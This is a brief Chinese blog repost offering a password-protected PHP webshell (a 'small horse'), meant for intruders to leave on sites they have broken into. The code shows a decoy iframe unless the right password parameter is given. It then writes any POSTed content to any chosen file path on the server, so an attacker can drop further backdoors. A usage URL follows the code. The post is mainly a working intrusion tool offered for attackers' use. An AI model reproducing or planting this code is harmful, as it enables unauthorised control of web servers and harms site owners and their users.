证的php安全小马

摘自：Ha0k's Blog

现在好多人渗透时经常忘了把小马删除，造成站被别人给黑掉，这里给丢个简单加层密码的小马。

<?php
$mode="ha0k";               //密码修改这个地方就可以了.
if($_REQUEST['ha0k']!=$mode)
{
echo "<iframe src=bhst width=100% height=100% frameborder=0></iframe> ";
exit;
}
?>

<?php
if ($_POST)
{
$f=fopen($_POST["f"],"w");
if(fwrite($f,$_POST["c"]))
echo "<font color=red>成功!</font>";
else
echo "<font color=blue>失败!</font>";
}
?>

<title>Ha0k FOR justice</title>
<form action="" method="post">
Pony:<input type="text" size=48 name="f" value='<?php echo $_SERVER["SCRIPT_FILENAME"];?>'>
<input type="submit" id="b" value="HackIt"><br>
<textarea name="c" cols=60 rows=9></textarea>
</form>
<p></p>

使用方法：http://site/ha0k?ha0k=你的密码